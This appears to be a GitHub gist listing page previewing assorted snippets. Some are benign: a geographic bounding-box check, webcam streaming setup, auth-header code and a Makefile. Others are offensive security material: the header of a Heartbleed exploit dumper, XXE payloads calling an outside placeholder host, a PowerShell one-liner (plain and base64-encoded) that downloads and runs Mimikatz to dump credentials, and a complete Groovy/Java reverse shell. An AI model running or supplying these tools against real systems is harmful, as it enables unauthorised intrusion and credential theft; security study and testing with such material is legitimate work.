Skip to content

Instantly share code, notes, and snippets.

View decidedlygray's full-sized avatar

Decidedly Gray decidedlygray

43 followers · 39 following
View GitHub Profile
@jsundram
jsundram / cull.py
Last active April 5, 2023 15:22
Check if lat long is inside the bounds of the continental US (box model, not shape)
# http://en.wikipedia.org/wiki/Extreme_points_of_the_United_States#Westernmost
top = 49.3457868 # north lat
left = -124.7844079 # west long
right = -66.9513812 # east long
bottom = 24.7433195 # south lat
def cull(latlngs):
""" Accepts a list of lat/lng tuples.
returns the list of tuples that are within the bounding box for the US.
NB. THESE ARE NOT NECESSARILY WITHIN THE US BORDERS!
@endolith
endolith / readme.md
Last active April 13, 2024 17:07
How to stream a webcam to a web browser in Ubuntu

Grr this took hours to figure out. I was trying to install MJPG-streamer and running VLC command lines and all this crap but nothing worked.

First install motion:

~> sudo apt-get install motion

Then create a config file:

~> mkdir ~/.motion

~> nano ~/.motion/motion.conf

@mwielgoszewski
mwielgoszewski / burpscript.py
Last active October 27, 2021 01:32
This extension registers an IHttpListener configured to execute a custom script editable via the Script tab added to Burp. The script is executed in the context with the following global and local variables (extender, callbacks, helpers, toolFlag, messageIsRequest, messageInfo).
from java.awt import Font
from javax.swing import JScrollPane, JTextPane
from javax.swing.text import SimpleAttributeSet
from burp import IBurpExtender, IExtensionStateListener, IHttpListener, ITab
import base64
import traceback
@cinu
cinu / ssl_heartbleed_dirty_dumper.py
Last active July 8, 2018 22:19 — forked from LucaBongiorni/ssltest.py
SSL heartbleed dirty dumper
#!/usr/bin/python
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
#
# Modified slightly by Andreas Thienemann <athienemann@schubergphilis.com> for clearer exploit code
# and 64k reads
#
# This version of the exploit does write received data to a file called "dump" in the local directory
# for analysis.
@brandonmwest
brandonmwest / example.cs
Last active January 16, 2024 15:52
Generating base64-encoded Authorization headers in a variety of languages
httpClient.DefaultRequestHeaders.Authorization =
new AuthenticationHeaderValue(
"Basic",
Convert.ToBase64String(
System.Text.ASCIIEncoding.ASCII.GetBytes(
string.Format("{0}:{1}", username, password))));
@kwk
kwk / Makefile
Last active March 17, 2024 22:54
Compiling with Address Sanitizer (ASAN) with CLANG and with GCC-4.8
.PHONY: using-gcc using-gcc-static using-clang
using-gcc:
g++-4.8 -o main-gcc -lasan -O -g -fsanitize=address -fno-omit-frame-pointer main.cpp && \
ASAN_OPTIONS=symbolize=1 ASAN_SYMBOLIZER_PATH=$(shell which llvm-symbolizer) ./main-gcc
using-gcc-static:
g++-4.8 -o main-gcc-static -static-libstdc++ -static-libasan -O -g -fsanitize=address -fno-omit-frame-pointer main.cpp && \
ASAN_OPTIONS=symbolize=1 ASAN_SYMBOLIZER_PATH=$(shell which llvm-symbolizer) ./main-gcc-static
@staaldraad
staaldraad / XXE_payloads
Last active May 8, 2024 01:23
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@gfoss
gfoss / Quick-Mimikatz
Last active October 26, 2023 09:48
Quick Mimikatz
*NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!*
#mimikatz [local]
IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds;
#encoded-mimikatz [local]
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AQgBDAC0AUwBFAEMAVQBSAEkAVABZAC8ARQBtAHAAaQByAGUALwBtAGEAcwB0AGUAcgAvAGUAbQBwAGkAcgBlAC8AcwBlAHIAdgBlAHIALwBkAGEAdABhAC8AbQBvAGQAdQBsAGUAXwBzAG8AdQByAGMAZQAvAGMAcgBlAGQAZQBuAHQAaQBhAGwAcwAvAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6AC4AcABzADEAIgApADsAIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0AQwBvAG0AbQBhAG4AZAAgAHAAcgBpAHYAaQBsAGUAZwBl
@frohoff
frohoff / revsh.groovy
Created March 2, 2016 18:55
Pure Groovy/Java Reverse Shell
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
@clckwrkbdgr
clckwrkbdgr / pastebin.py
Created March 6, 2016 16:20
Using Pastebin as a free online data storage
import requests
import xml.etree.ElementTree as ET
import sys
class Pastebin:
def __init__(self, api_key, user_key):
self.api_key, self.user_key = api_key, user_key
self.session = requests.session()
def _post(self, option, data = None):
data = data.copy() if data else {}